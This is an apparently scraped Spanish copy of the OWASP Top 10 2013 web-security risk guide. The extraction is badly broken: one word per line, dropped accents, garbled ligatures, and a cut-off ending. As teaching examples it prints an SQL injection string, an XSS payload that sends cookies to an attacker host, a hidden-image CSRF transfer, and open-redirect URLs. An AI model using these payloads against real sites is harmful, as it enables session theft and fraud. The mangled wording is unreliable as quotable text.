Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Top 10 2013 Owasp
Top 10 2013 Owasp
Acerca de OWASP
Prefacio
Acerca de OWASP
El
soNware
inseguro
est
debilitando
las
nanzas,
salud,
defensa,
energa,
y
otras
infraestructuras
cr=cas.
A
medida
que
la
infraestructura
digital
se
hace
cada
vez
ms
compleja
e
interconectada,
la
dicultad
de
lograr
la
seguridad
en
aplicaciones
aumenta
exponencialmente.
No
se
puede
dar
el
lujo
de
tolerar
problemas
de
seguridad
rela=vamente
sencillos,
como
los
que
se
presentan
en
este
OWASP
Top
10.
El
obje=vo
del
proyecto
Top
10
es
crear
conciencia
acerca
de
la
seguridad
en
aplicaciones
mediante
la
iden=cacin
de
algunos
de
los
riesgos
ms
cr=cos
que
enfrentan
las
organizaciones.
El
proyecto
Top
10
es
referenciado
por
muchos
estndares,
libros,
herramientas,
y
organizaciones,
incluyendo
MITRE,
PCI
DSS,
DISA,
FCT,
y
muchos
ms
.
Esta
versin
de
OWASP
Top
10
marca
el
aniversario
nmero
diez
de
este
proyecto,
de
concien=zacin
sobre
la
importancia
de
los
riesgos
de
seguridad
en
aplicaciones.
OWASP
Top
10
fue
lanzado
por
primera
vez
en
2003,
con
actualizaciones
menores
en
2004
y
2007.
La
versin
2010
fue
renovada
para
dar
prioridad
al
riesgo,
no
slo
a
la
prevalencia.
La
edicin
2013
sigue
el
mismo
enfoque.
Lo
invitamos
a
que
u=lice
el
Top
10
para
hacer
que
su
organizacin
se
inicie
en
la
tem=ca
sobre
seguridad
en
aplicaciones.
Los
desarrolladores
pueden
aprender
de
los
errores
de
otras
organizaciones.
Los
ejecu=vos
deben
comenzar
a
pensar
como
ges=onar
el
riesgo
que
las
aplicaciones
de
soNware
crean
en
sus
empresas.
A
largo
plazo,
le
recomendamos
que
cree
un
programa
de
seguridad
en
aplicaciones
que
sea
compa=ble
con
su
cultura
y
su
tecnologa.
Estos
programas
vienen
en
todas
las
formas
y
tamaos,
y
debe
evitar
tratar
de
hacer
todo
lo
prescrito
por
algn
modelo
de
procesos.
En
cambio,
debe
de
aprovechar
las
fortalezas
existentes
en
su
organizacin
para
hacer
y
medir
lo
que
le
funcione
a
usted.
Esperamos
que
OWASP
Top
10
sea
=l
para
sus
esfuerzos
de
seguridad
en
aplicaciones.
Por
favor
no
dude
en
ponerse
en
contacto
con
OWASP
para
sus
dudas,
comentarios,
e
ideas,
ya
sea
pblicamente
a
owasp-topten@lists.owasp.org
o
en
privado
a
dave.wichers@owasp.org.
El
proyecto
abierto
de
seguridad
en
aplicaciones
Web
(OWASP
por
sus
siglas
en
ingls)
es
una
comunidad
abierta
dedicada
a
facultar
a
las
organizaciones
a
desarrollar,
adquirir
y
mantener
aplicaciones
que
pueden
ser
conables.
En
OWASP
encontrar
gratuitas
y
abiertas
Herramientas
y
estndares
de
seguridad
en
aplicaciones
Libros
completos
de
revisiones
de
seguridad
en
aplicaciones,
desarrollo
de
cdigo
fuente
seguro,
y
revisiones
de
seguridad
en
cdigo
fuente
Controles
de
seguridad
estndar
y
libreras
Captulos
locales
en
todo
el
mundo
Inves=gaciones
de
vanguardia
Extensas
conferencias
alrededor
del
mundo
Listas
de
correo
Aprenda
ms
en:
hGps://www.owasp.org
Todas
las
herramientas
de
OWASP,
documentos,
foros,
y
captulos
son
gratuitas
y
abiertas
a
cualquiera
interesado
en
mejorar
la
seguridad
en
aplicaciones.
Abogamos
por
resolver
la
seguridad
en
aplicaciones
como
un
problema
de
personas,
procesos
y
tecnologa,
ya
que
los
enfoques
ms
efec=vos
para
la
seguridad
en
aplicaciones
requieren
mejoras
en
todas
estas
reas.
OWASP
es
un
nuevo
=po
de
organizacin.
Nuestra
libertad
de
presiones
comerciales
nos
permite
proveer
informacin
sobre
seguridad
en
aplicaciones
sin
sesgos,
prc=ca
y
efec=va.
OWASP
no
est
aliada
con
ninguna
compaa
de
tecnologa,
aunque
apoyamos
el
uso
instruido
de
tecnologas
de
seguridad
comercial.
Al
igual
que
muchos
otros
proyectos
de
soNware
de
cdigo
abierto,
OWASP
produce
muchos
=pos
de
materiales
en
una
manera
abierta
y
colabora=va.
La
fundacin
OWASP
es
una
en=dad
sin
nimo
de
lucro
para
asegurar
el
xito
a
largo
plazo
del
proyecto.
Casi
todos
los
asociados
con
OWASP
son
voluntarios,
incluyendo
la
junta
direc=va
de
OWASP,
comits
globales,
lderes
de
captulos,
los
lderes
y
miembros
de
proyectos.
Apoyamos
la
inves=gacin
innovadora
sobre
seguridad
a
travs
de
becas
e
infraestructura.
nase
a
nosotros!
Este
documento
se
distribuye
bajo
la
licencia
3.0
de
Crea=ve
Commons
AGribu=on
ShareAlike.
Para
cualquier
reu=lizacin
o
distribucin,
debe
dejar
claro
los
trminos
de
la
licencia
de
esta
obra.
Introduccin
Bienvenidos
Bienvenidos
al
OWASP
Top
10
2013!
Esta
actualizacin
profundiza
sobre
una
de
las
categoras
de
la
versin
2010,
a
n
de
ser
ms
inclusivo,
sobre
importantes
vulnerabilidades
comunes,
y
reordena
algunos
de
los
dems
basndose
en
el
cambio
de
los
datos
de
prevalencia.
Tambin
presenta
un
componente
de
seguridad
como
centro
de
atencin,
mediante
la
creacin
de
una
categora
especca
para
este
riesgo,
sacndolo
de
la
oscuridad
de
la
letra
pequea
del
Top
Ten
2010;
A6:
La
conguracin
de
seguridad
incorrecta.
El
OWASP
Top
10
2013,
se
basa
en
8
conjuntos
de
datos
de
7
rmas
especializadas
en
seguridad
de
aplicaciones,
incluyendo
4
empresas
consultoras
y
3
proveedores
de
herramientas
/SaaS
(1
est=co,
dinmico
1,
y
1
con
ambos).
Estos
datos
abarcan
ms
de
500.000
vulnerabilidades
a
travs
de
cientos
de
organizaciones
y
miles
de
aplicaciones.
Las
vulnerabilidades
del
Top
10
son
seleccionadas
y
priorizadas
de
acuerdo
a
estos
datos
de
prevalencia,
en
combinacin
con
es=maciones
consensuadas
de
explotabilidad,
detectabilidad
e
impacto.
El
obje=vo
principal
del
Top
10
es
educar
a
los
desarrolladores,
diseadores,
arquitectos,
gerentes,
y
organizaciones
;
sobre
las
consecuencias
de
las
vulnerabilidades
de
seguridad
ms
importantes
en
aplicaciones
web.
El
Top
10
provee
tcnicas
bsicas
sobre
como
protegerse
en
estas
reas
de
alto
riesgo
y
tambin
provee
orientacin
sobre
los
pasos
a
seguir.
Advertencias
Agradecimientos
No
se
detenga
en
el
Top
10.
Existen
cientos
de
problemas
que
pueden
afectar
la
seguridad
en
general
de
una
aplicacin
web
,
tal
como
se
ha
discu=do
en
la
Gua
de
Desarrollo
OWASP
y
OWASP
Cheat
Sheet.
Este
documento
es
de
lectura
esencial
para
cualquiera
que
desarrolle
aplicaciones
web
hoy
en
da.
Una
efec=va
orientacin
en
como
encontrar
vulnerabilidades
en
aplicaciones
web
es
suministrada
en
las
Gua
de
Pruebas
OWASP
y
la
Gua
de
Revisin
de
Cdigo
OWASP.
Cambio
constante.
Este
Top
10
con=nuar
cambiando.
Incluso
sin
cambiar
una
sola
lnea
de
cdigo
en
la
aplicacin,
es
posible
llegar
a
ser
vulnerable,
ya
que
al
descubrirse
nuevos
defectos,
los
ataques
son
renados.
Por
favor,
revise
los
consejos
al
nal
del
Top
10
Prximos
pasos
para
Desarrolladores,
Vericadores
y
Organizaciones
para
mayor
informacin.
Piense
posiCvamente.
Cuando
se
encuentre
preparado
para
dejar
de
buscar
vulnerabilidades
y
focalizarse
en
establecer
controles
seguros
de
aplicaciones,
OWASP
ha
producido
el
Applica=on
Security
Verica=on
Standard
(ASVS)
como
una
gua
para
organizaciones
y
revisores
de
aplicaciones
que
detalla
los
controles
de
seguridad
a
vericar
en
una
aplicacin.
UClice
herramientas
inteligentemente.
Las
vulnerabilidades
de
seguridad
pueden
ser
bastante
complejas
y
encontrarse
ocultas
en
montaas
de
cdigo.
En
muchos
casos,
el
enfoque
mas
eciente
y
econmico
para
encontrar
y
eliminar
dichas
vulnerabilidades
es
la
combinacin
de
expertos
armados
con
buenas
herramientas
para
realizar
esta
tarea.
Push
leF.
Enfocarse
en
hacer
que
la
seguridad
sea
parte
de
la
cultura
organizacional
a
travs
de
todo
el
ciclo
de
desarrollo.
Puede
encontrar
ms
informacin
en
Open
SoNware
Assurance
Maturity
Model
(SAMM)
y
Rugged
Handbook.
RN
Basados
en
nuestros
datos,
la
Prdida
de
Auten=cacin
y
Ges=n
de
Sesiones
ascendi
en
prevalencia.
Pensamos
que
probablemente
se
deba
a
que
se
estn
realizando
mayores
esfuerzos
de
deteccin,
y
no
a
un
aumento
de
prevalencia
en
s.
Por
este
mo=vo,
intercambiamos
las
posiciones
de
los
riesgos
A2
y
A3.
2)
Falsicacin
de
Pe=ciones
en
Si=os
Cruzados
(CSRF)
disminuy
en
prevalencia
en
base
a
nuestros
datos,
por
lo
tanto
descendi
de
la
posicin
2010-A5
a
la
posicin
2013-A8.
Creemos
que
se
debe
a
que
ste
ha
estado
durante
6
aos
en
el
OWASP
Top
10
,
mo=vando
a
las
organizaciones
y
desarrolladores
de
frameworks
a
enfocarse
lo
suciente
para
reducir
signica=vamente
el
nmero
de
vulnerabilidades
en
las
aplicaciones
del
"mundo
real".
3)
Hemos
ampliado
Falla
de
Restriccin
de
Acceso
a
URL
desde
el
OWASP
Top
10
2010
para
brindarle
un
signicado
ms
amplio:
+ 2010-A8:
Falla
de
Restriccin
de
Acceso
a
URL
ahora
es
2013-A7:
Ausencia
de
Control
de
Acceso
a
las
Funciones
-
para
cubrir
todos
los
controles
de
acceso
a
nivel
de
funcin.
Existen
muchas
maneras
de
especicar
a
qu
funcin
se
accede,
no
slo
la
URL.
4)
Hemos
fusionado
y
ampliado
2010-A7
y
A9-2010
para
crear:
2013-A6:
Exposicin
de
Datos
Sensibles:
+ Esta
nueva
categora
fue
creada
por
la
fusin
de
2010-A7
-
Almacenamiento
Criptogrco
Inseguro
y
2010-A9
-
Proteccin
Insuciente
en
la
Capa
de
Transporte,
adems
de
aadir
riesgos
de
exposicin
de
datos
sensibles
en
el
navegador.
Esta
nueva
categora
abarca
la
proteccin
de
datos
sensibles
(dis=nta
al
control
de
acceso,
que
est
cubierta
por
2013-A4
y
2013-A4)
desde
que
es
provisto
por
el
usuario,
transmi=do,
almacenado
por
la
aplicacin
y
enviado
al
navegador
nuevamente.
5)
A1 Inyeccin
A1 Inyeccin
Agentes
de
Amenaza
Vectores
de
Ataque
Debilidades
de
Seguridad
Impactos
Tcnicos
Controles
de
Seguridad
Debilidad
Ataque
Impactos
al
Negocio
Impacto
Control
Recurso
Ataque
Debilidad
Impacto
Control
Funcin
Ataque
Debilidad
Impacto
Recurso
Debilidad
Control
A
veces,
estas
rutas
son
triviales
de
encontrar
y
explotar,
y
a
veces
son
muy
di|ciles.
Del
mismo
modo,
el
dao
que
se
causa
puede
ir
de
ninguna
consecuencia,
o
ponerlo
fuera
del
negocio.
Para
determinar
el
riesgo
en
su
organizacin,
puede
evaluar
la
probabilidad
asociada
a
cada
agente
de
amenaza,
vector
de
ataque,
y
la
debilidad
en
la
seguridad,
y
combinarla
con
una
es=macin
del
impacto
tcnico
y
de
negocios
para
su
organizacin.
En
conjunto,
estos
factores
determinan
el
riesgo
global.
Cul es Mi riesgo?
Referencias
El
OWASP
Top
10
se
enfoca
en
la
iden=cacin
de
los
riesgos
ms
serios
para
una
amplia
gama
de
organizaciones.
Para
cada
uno
de
estos
riesgos,
proporcionamos
informacin
genrica
sobre
la
probabilidad
y
el
impacto
tcnico
a
travs
del
siguiente
esquema
de
calicaciones,
que
est
basado
en
Metodologa
de
Evaluacin
de
Riesgos
OWASP.
Agente
Vectores
Prevalencia
de
Detectabilidad
de
Amenaza
de
Ataque
Debilidades
de
Debilidades
Especco
de
la
aplicacion
Impacto
Tcnico
Impacto
al
Negocio
Especco
de
la
aplicacin
/negocio
Fcil
Difundido
Fcil
Severo
Promedio
Comn
Promedio
Moderado
Di|cil
Poco Comn
Di|cil
Menor
Slo
usted
sabe
los
detalles
especcos
de
su
negocio.
Para
una
aplicacin
determinada,
podra
no
exis=r
un
agente
de
amenaza
que
pueda
ejecutar
el
ataque
en
cues=n,
o
el
impacto
tcnico
podra
no
hacer
ninguna
diferencia
en
su
negocio.
Por
lo
tanto,
usted
debe
evaluar
cada
riesgo,
enfocndose
en
los
agentes
de
amenaza,
los
controles
de
seguridad
y
el
impacto
al
negocio.
Nosotros
enunciamos
los
Agentes
de
Amenaza
como
especcos
de
la
aplicacin,
y
el
impacto
al
negocio
como
especco
de
la
aplicacin/negocio,
con
el
n
de
indicar
que
estos
son
claramente
dependientes
de
los
detalles
especcos
de
las
aplicaciones
en
su
empresa.
Los
nombres
de
los
riesgos
en
el
Top
10
derivan
del
=po
de
ataque,
el
=po
de
debilidad
o
el
=po
de
impacto
que
causan.
Hemos
elegido
los
nombres
que
reejan
con
precisin
los
riesgos
y,
cuando
es
posible,
alineamos
con
la
terminologa
comn
para
aumentar
el
nivel
de
conciencia
sobre
ellos.
OWASP
OWASP
Risk
Ra=ng
Methodology
Externas
T10
A1- Inyeccin
Las
fallas
de
inyeccin,
tales
como
SQL,
OS,
y
LDAP,
ocurren
cuando
datos
no
conables
son
enviados
a
un
interprete
como
parte
de
un
comando
o
consulta.
Los
datos
hos=les
del
atacante
pueden
engaar
al
interprete
en
ejecutar
comandos
no
intencionados
o
acceder
datos
no
autorizados.
A2
Prdida
de
AutenCcacin
y
GesCn
de
Sesiones
A3
Secuencia
de
Comandos
en
SiCos
Cruzados
(XSS)
Las
fallas
XSS
ocurren
cada
vez
que
una
aplicacin
toma
datos
no
conables
y
los
enva
al
navegador
web
sin
una
validacin
y
codicacin
apropiada.
XSS
permite
a
los
atacantes
ejecutar
secuencia
de
comandos
en
el
navegador
de
la
vic=ma
los
cuales
pueden
secuestrar
las
sesiones
de
usuario,
destruir
si=os
web,
o
dirigir
al
usuario
hacia
un
si=o
malicioso.
A4
Referencia
Directa
Insegura
a
Objetos
Una
referencia
directa
a
objetos
ocurre
cuando
un
desarrollador
expone
una
referencia
a
un
objeto
de
implementacin
interno,
tal
como
un
chero,
directorio,
o
base
de
datos.
Sin
un
chequeo
de
control
de
acceso
u
otra
proteccin,
los
atacantes
pueden
manipular
estas
referencias
para
acceder
datos
no
autorizados.
A5
Conguracin
de
Seguridad
Incorrecta
Una
buena
seguridad
requiere
tener
denida
e
implementada
una
conguracin
segura
para
la
aplicacin,
marcos
de
trabajo,
servidor
de
aplicacin,
servidor
web,
base
de
datos,
y
plataforma.
Todas
estas
conguraciones
deben
ser
denidas,
implementadas,
y
mantenidas
ya
que
por
lo
general
no
son
seguras
por
defecto.
Esto
incluye
mantener
todo
el
soNware
actualizado,
incluidas
las
libreras
de
cdigo
u=lizadas
por
la
aplicacin.
A6
Exposicin
de
datos
sensibles
Muchas
aplicaciones
web
no
protegen
adecuadamente
datos
sensibles
tales
como
nmeros
de
tarjetas
de
crdito
o
credenciales
de
auten=cacin.
Los
atacantes
pueden
robar
o
modicar
tales
datos
para
llevar
a
cabo
fraudes,
robos
de
iden=dad
u
otros
delitos.
Los
datos
sensibles
requieren
de
mtodos
de
proteccin
adicionales
tales
como
el
cifrado
de
datos,
as
como
tambin
de
precauciones
especiales
en
un
intercambio
de
datos
con
el
navegador.
A7
Ausencia
de
Control
de
Acceso
a
Funciones
La
mayora
de
aplicaciones
web
verican
los
derechos
de
acceso
a
nivel
de
funcin
antes
de
hacer
visible
en
la
misma
interfaz
de
usuario.
A
pesar
de
esto,
las
aplicaciones
necesitan
vericar
el
control
de
acceso
en
el
servidor
cuando
se
accede
a
cada
funcin.
Si
las
solicitudes
de
acceso
no
se
verican,
los
atacantes
podrn
realizar
pe=ciones
sin
la
autorizacin
apropiada.
A8
-
Falsicacin
de
PeCciones
en
SiCos
Cruzados
(CSRF)
Un
ataque
CSRF
obliga
al
navegador
de
una
vic=ma
auten=cada
a
enviar
una
pe=cin
HTTP
falsicado,
incluyendo
la
sesin
del
usuario
y
cualquier
otra
informacin
de
auten=cacin
incluida
autom=camente,
a
una
aplicacin
web
vulnerable.
Esto
permite
al
atacante
forzar
al
navegador
de
la
vic=ma
para
generar
pedidos
que
la
aplicacin
vulnerable
piensa
son
pe=ciones
leg=mas
provenientes
de
la
vic=ma.
A9
UClizacin
de
componentes
con
vulnerabilidades
conocidas
Algunos
componentes
tales
como
las
libreras,
los
frameworks
y
otros
mdulos
de
soNware
casi
siempre
funcionan
con
todos
los
privilegios.
Si
se
ataca
un
componente
vulnerable
esto
podra
facilitar
la
intrusin
en
el
servidor
o
una
perdida
seria
de
datos.
Las
aplicaciones
que
u=licen
componentes
con
vulnerabilidades
conocidas
debilitan
las
defensas
de
la
aplicacin
y
permiten
ampliar
el
rango
de
posibles
ataques
e
impactos.
A10
Redirecciones
y
reenvios
no
validados
Las
aplicaciones
web
frecuentemente
redirigen
y
reenvan
a
los
usuarios
hacia
otras
pginas
o
si=os
web,
y
u=lizan
datos
no
conables
para
determinar
la
pgina
de
des=no.
Sin
una
validacin
apropiada,
los
atacantes
pueden
redirigir
a
las
vc=mas
hacia
si=os
de
phishing
o
malware,
o
u=lizar
reenvos
para
acceder
pginas
no
autorizadas.
A1
Agentes
de
Amenaza
Inyeccin
Vectores
de
Ataque
Especco
de
la
Aplicacin
Explotabilidad
FCIL
Considere
a
cualquiera
que
pueda
enviar
informacin
no
conable
al
sistema,
incluyendo
usuarios
externos,
usuarios
internos
y
administradores.
Debilidades
de
Seguridad
Prevalencia
COMN
Deteccin
PROMEDIO
Impactos
Tcnicos
Impactos
al
negocio
Impacto
SEVERO
Especco
de
la
aplicacin/negocio
Considere
el
valor
de
negocio
de
los
datos
afectados
y
la
plataforma
sobre
la
que
corre
el
intrprete.
Todos
los
datos
pueden
ser
robados,
modicados
o
eliminados.
Podra
ser
daada
su
reputacin?
Soy Vulnerable?
Cmo prevenirlo?
Referencias
OWASP
Externas
CWE
Entry
77
on
Command
Injec=on
hvp://example.com/app/accountView?id=' or '1'='1
Prdida
de
AutenCcacin
y
GesCn
de
Sesiones
A2
Agentes
de
Amenaza
Vectores
de
Ataque
Especco
de
la
Aplicacin
Explotabilidad
PROMEDIO
Considere
atacantes
annimos
externos,
as
como
a
usuarios
con
sus
propias
cuentas,
que
podran
intentar
robar
cuentas
de
otros.
Considere
tambin
a
trabajadores
que
quieran
enmascarar
sus
acciones.
El
atacante
u=liza
ltraciones
o
vulnerabilidades
en
las
funciones
de
auten=cacin
o
ges=n
de
las
sesiones
(ej.
cuentas
expuestas,
contraseas,
iden=cadores
de
sesin)
para
suplantar
otros
usuarios.
Impactos
Tcnicos
Impactos
al
negocio
Impacto
SEVERO
Especco
de
la
aplicacin/negocio
Estas
vulnerabilidades
pueden
permi=r
que
algunas
o
todas
las
cuentas
sean
atacadas.
Una
vez
que
el
ataque
resulte
exitoso,
el
atacante
podra
realizar
cualquier
accin
que
la
vc=ma
pudiese.
Las
cuentas
privilegiadas
son
obje=vos
prioritarios.
Considere
el
valor
de
negocio
de
los
datos
afectados
o
las
funciones
de
la
aplicacin
expuestas.
Debilidades
de
Seguridad
Prevalencia
DIFUNDIDO
Deteccin
PROMEDIO
Tambin
considere
el
impacto
en
el
negocio
de
la
exposicin
pblica
de
la
vulnerabilidad.
Soy Vulnerable?
Cmo prevenirlo?
Referencias
OWASP
hvp://example.com/sale/
saleitems;jsessionid=2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?
dest=Hawaii
b.
Externas
CWE
Entry
287
on
Improper
Authen=ca=on
A3
Agentes
de
Amenaza
Vectores
de
Ataque
Explotabilidad
PROMEDIO
Especco
de
la
Aplicacin
Considere
cualquier
persona
que
pueda
enviar
datos
no
conables
al
sistema,
incluyendo
usuarios
externos,
internos
y
administradores.
Debilidades
de
Seguridad
Prevalencia
MUY
DIFUNDIDA
Deteccin
FACIL
Impactos
Tcnicos
Impactos
al
negocio
Impacto
MODERADO
Especco
de
la
aplicacin
/
negocio
El
atacante
puede
ejecutar
secuencias
de
comandos
en
el
navegador
de
la
vc=ma
para
secuestrar
las
sesiones
de
usuario,
alterar
la
apariencia
del
si=o
web,
insertar
cdigo
La
mayora
de
las
fallas
XSS
son
detectadas
de
hos=l,
redirigir
usuarios,
forma
rela=vamente
fcil
a
travs
de
pruebas
o
por
secuestrar
el
navegador
medio
del
anlisis
del
cdigo.
de
la
vc=ma
u=lizando
malware,
etc.
Soy Vulnerable?
Cmo prevenirlo?
2.
3.
Las
tecnologas
Web
2.0
como
Ajax,
hacen
que
XSS
sea
mucho
ms
di|cil
de
detectar
mediante
herramientas
automa=zadas.
4.
OWASP
'><script>document.locaCon=
'hvp://www.avacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>'.
Externas
CWE
Entry
79
on
Cross-Site
Scrip=ng
A4
Agentes
de
Amenaza
Especco
de
la
Aplicacin
Considere
los
=pos
de
usuarios
en
su
sistema.
Existen
usuarios
que
tengan
nicamente
acceso
parcial
a
determinados
=pos
de
datos
del
sistema?
Explotabilidad
FCIL
Un
atacante,
como
usuario
autorizado
en
el
sistema,
simplemente
modica
el
valor
de
un
parmetro
que
se
reere
directamente
a
un
objeto
del
sistema
por
otro
objeto
para
el
que
el
usuario
no
se
encuentra
autorizado.
Se
concede
el
acceso?
Debilidades
de
Seguridad
Prevalencia
COMN
Deteccin
FCIL
Impactos
Tcnicos
Impactos
al
negocio
Impacto
MODERADO
Especco
de
la
aplicacin/negocio
Dichas
vulnerabilidades
pueden
comprometer
toda
la
informacin
que
pueda
ser
referida
por
parmetros.
A
menos
que
el
espacio
de
nombres
resulte
escaso,
para
un
atacante
resulta
sencillo
acceder
a
todos
los
datos
disponibles
de
ese
=po.
Considere
el
valor
de
negocio
de
los
datos
afectados
o
las
funciones
de
la
aplicacin
expuestas.
Tambin
considere
el
impacto
en
el
negocio
de
la
exposicin
pblica
de
la
vulnerabilidad.
Soy Vulnerable?
Cmo prevenirlo?
1.
2.
hvp://example.com/app/accountInfo?acct=notmyacct
1.
2.
Externas
CWE
Entry
639
on
Insecure
Direct
Object
References
CWE
Entry
22
on
Path
Traversal
(que
es
un
ejemplo
de
ataque
de
referencia
a
un
objeto
directo)
Conguracin
de
Seguridad
Incorrecta
A5
Vectores
de
Ataque
Agentes
de
Amenaza
Especco
de
la
Aplicacin
Explotabilidad
FCIL
Considere
atacantes
annimos
externos
as
como
usuarios
con
sus
propias
cuentas
que
pueden
intentar
comprometer
el
sistema.
Tambin
considere
personal
interno
buscando
enmascarar
sus
acciones.
Un
atacante
accede
a
cuentas
por
defecto,
pginas
sin
uso,
fallas
sin
parchear,
archivos
y
directorios
sin
proteccin,
etc.
para
obtener
acceso
no
autorizado
o
conocimiento
del
sistema.
Debilidades
de
Seguridad
Prevalencia
COMN
Deteccin
FCIL
Impactos
Tcnicos
Impactos
al
negocio
Impacto
MODERADO
Especco
de
la
aplicacin
/
negocio
Estas
vulnerabilidades
frecuentemente
dan
a
los
atacantes
acceso
no
autorizado
a
algunas
funcionalidades
o
datos
del
sistema.
Ocasionalmente
provocan
que
el
sistema
se
comprometa
totalmente.
Soy vulnerable?
Cmo prevenirlo?
1.
2.
3.
4.
OWASP
Externos
PC
Magazine
Ar=cle
on
Web
Server
Hardening
CWE
Entry
2
on
Environmental
Security
Flaws
CIS
Security
Congura=on
Guides/Benchmarks
A6
Agentes
de
Amenaza
Especco
de
la
Aplicacin
Explotabilidad
DIFCIL
Debilidades
de
Seguridad
Prevalencia
NO
COMN
Impactos
al
negocio
Impacto
SEVERO
Especco
de
la
Aplicacin/Negocio
Los
fallos
frecuentemente
comprometen
todos
los
datos
que
deberan
estar
protegidos.
Tpicamente,
esta
informacin
incluye
datos
sensibles
como
ser
registros
mdicos,
credenciales,
datos
personales,
tarjetas
de
crdito,
etc.
Considere
el
valor
de
negocio
de
la
prdida
de
datos
y
el
impacto
a
su
reputacin.
Cul
su
responsabilidad
legal
si
estos
datos
son
expuestos?
Tambin
considere
el
dao
a
la
reputacin.
Deteccin
PROMEDIO
Soy Vulnerable?
Impactos
Tcnicos
Cmo prevenirlo?
Y
ms
...
Por
un
conjunto
completo
de
problemas
a
evitar,
ver
ASVS
areas
Crypto
(V7),
Data
Prot.
(V9),
and
SSL
(V10).
Referencias en ingls)
OWASP
Escenario
#3:
La
base
de
datos
de
claves
usa
hashes
sin
salt
para
almacenar
las
claves.
Una
falla
en
una
subida
de
archivo
permite
a
un
atacante
obtener
el
archivo
de
claves.
Todas
las
claves
pueden
ser
expuestas
mediante
una
tabla
rainbow
de
hashes
precalculados.
Externas
CWE
Entry
310
on
Cryptographic
Issues
CWE
Entry
312
on
Cleartext
Storage
of
Sensi=ve
Informa=on
CWE
Entry
319
on
Cleartext
Transmission
of
Sensi=ve
Informa=on
CWE
Entry
326
on
Weak
Encryp=on
A7
Vectores
de
Ataque
Agentes
de
Amenaza
Especco
de
la
Aplicacin
Explotabilidad
FCIL
El
atacante,
que
es
un
usuario
leg=mo
en
el
sistema,
simplemente
cambia
la
URL
o
un
parmetro
a
una
funcin
con
privilegios.
Se
le
concede
acceso?
Usuarios
annimos
podran
acceder
a
funcionalidades
privadas
que
no
estn
protegidas.
Debilidades
de
Seguridad
Prevalencia
COMN
Deteccin
PROMEDIO
Soy vulnerable?
Impactos
Tcnicos
Impactos
al
negocio
Impacto
MODERADO
Especco
de
la
aplicacin/negocio
Estas
vulnerabilidades
permiten
el
acceso
no
autorizado
de
los
atacantes
a
funciones
del
sistema.
Las
funciones
administra=vas
son
un
obje=vo
clave
de
este
=po
de
ataques.
Cmo prevenirlo?
2.
3.
OWASP
hvp://example.com/app/getappInfo
hvp://example.com/app/admin_getappInfo
Externos
A8
Vectores
de
Ataque
Agentes
de
Amenaza
Especco
de
la
Aplicacin
Explotabilidad
PROMEDIO
Considere
cualquier
persona
que
pueda
cargar
contenido
en
los
navegadores
de
los
usuarios,
y
as
obligarlos
a
presentar
una
solicitud
para
su
si=o
web.
Cualquier
si=o
web
o
canal
HTML
que
el
usuario
acceda
puede
realizar
este
=po
de
ataque.
Impactos
Tcnicos
Impactos
al
negocio
Impacto
MODERADO
Especco
de
la
aplicacin/negocio
Considerar
el
valor
de
negocio
asociado
a
los
datos
o
funciones
afectados.
Tener
en
cuenta
lo
que
representa
no
estar
seguro
si
los
usuarios
en
realidad
desean
realizar
dichas
acciones.
Considerar
el
impacto
que
=ene
en
la
reputacin
de
su
negocio.
Debilidades
de
Seguridad
Prevalencia
COMN
Deteccin
FCIL
Soy vulnerable?
Cmo
prevenirlo?
La
prevencin
CSRF
por
lo
general
requiere
la
inclusin
de
un
token
no
predecible
en
cada
solicitud
HTTP.
Estos
tokens
deben
ser,
como
mnimo,
nicos
por
cada
sesin
del
usuario.
1.
2.
Referencias
OWASP
hvp://example.com/app/transferFunds?
amount=1500&desCnaConAccount=4673243243
<img
src="hvp://example.com/app/transferFunds?
amount=1500&desCnaConAccount=avackersAcct#
width="0"
height="0"
/>
Externos
CWE
Entry
352
on
CSRF
A9
Agentes
de
Amenaza
Vectores
de
Ataque
Especco
de
la
Aplicacin
Explotabilidad
PROMEDIO
Algunos
componentes
vulnerables
(por
ejemplo
frameworks)
pueden
ser
iden=cados
y
explotados
con
herramientas
automa=zadas,
aumentando
las
opciones
de
la
amenaza
ms
all
del
obje=vo
atacado.
El
atacante
iden=ca
un
componente
dbil
a
travs
de
escaneos
autom=cos
o
anlisis
manuales.
Ajusta
el
exploit
como
lo
necesita
y
ejecuta
el
ataque.
Se
hace
ms
di|cil
si
el
componente
es
ampliamente
u=lizado
en
la
aplicacin.
Debilidades
de
Seguridad
Prevalencia
DIFUNDIDO
Detectabilidad
DIFCIL
Impactos
Tcnicos
Impactos
al
negocio
Impacto
MODERADO
Especco
de
la
aplicacin
/
negocio
El
rango
completo
de
debilidades
incluye
inyeccin,
control
de
acceso
roto,
XSS,
etc.
El
impacto
puede
ser
desde
mnimo
hasta
apoderamiento
completo
del
equipo
y
compromiso
de
los
datos.
Considere
qu
puede
signicar
cada
vulnerabilidad
para
el
negocio
controlado
por
la
aplicacin
afectada.
Puede
ser
trivial
o
puede
signicar
compromiso
completo.
Soy Vulnerable?
Cmo prevenirlo?
2.
3.
4.
Referencias
OWASP
Externas
Agentes
de
Amenaza
Especco
de
la
Aplicacin
Explotabilidad
PROMEDIO
Considere
la
probabilidad
de
que
alguien
pueda
engaar
a
los
usuarios
a
enviar
una
pe=cin
a
su
aplicacin
web.
Cualquier
aplicacin
o
cdigo
HTML
al
que
acceden
sus
usuarios
podra
realizar
este
engao
Debilidades
de
Seguridad
Prevalencia
POCO
COMN
Deteccin
FCIL
Impactos
Tcnicos
Impactos
al
negocio
Impacto
MODERADO
Especco
de
la
Aplicacin
/
Negocio
Estas
redirecciones
pueden
intentar
instalar
cdigo
malicioso
o
engaar
a
las
vc=mas
para
que
revelen
contraseas
u
otra
informacin
sensible.
El
uso
de
reenvos
inseguros
puede
permi=r
evadir
el
control
de
acceso.
Considere
el
valor
de
negocio
de
conservar
la
conanza
de
sus
usuarios.
Qu
pasara
si
sus
usuarios
son
infectados
con
cdigo
malicioso?
Qu
ocurrira
si
los
atacantes
pudieran
acceder
a
funciones
que
slo
debieran
estar
disponibles
de
forma
interna?
Soy vulnerable?
Cmo prevenirlo?
1.
1.
2.
3.
2.
3.
Referencias
OWASP
hvp://www.example.com/redirect.jsp?url=evil.com
Externas
hvp://www.example.com/boring.jsp?fwd=admin.jsp
+D
Requisitos
de
Seguridad
en
Aplicaciones
Para
producir
aplicaciones
web
seguras,
debe
denir
qu
signica
seguro
para
esa
aplicacin.
OWASP
recomienda
usar
Estndar
de
Vericacin
de
Seguridad
en
Aplicaciones
(ASVS)
OWASP
como
una
gua
para
ajustar
los
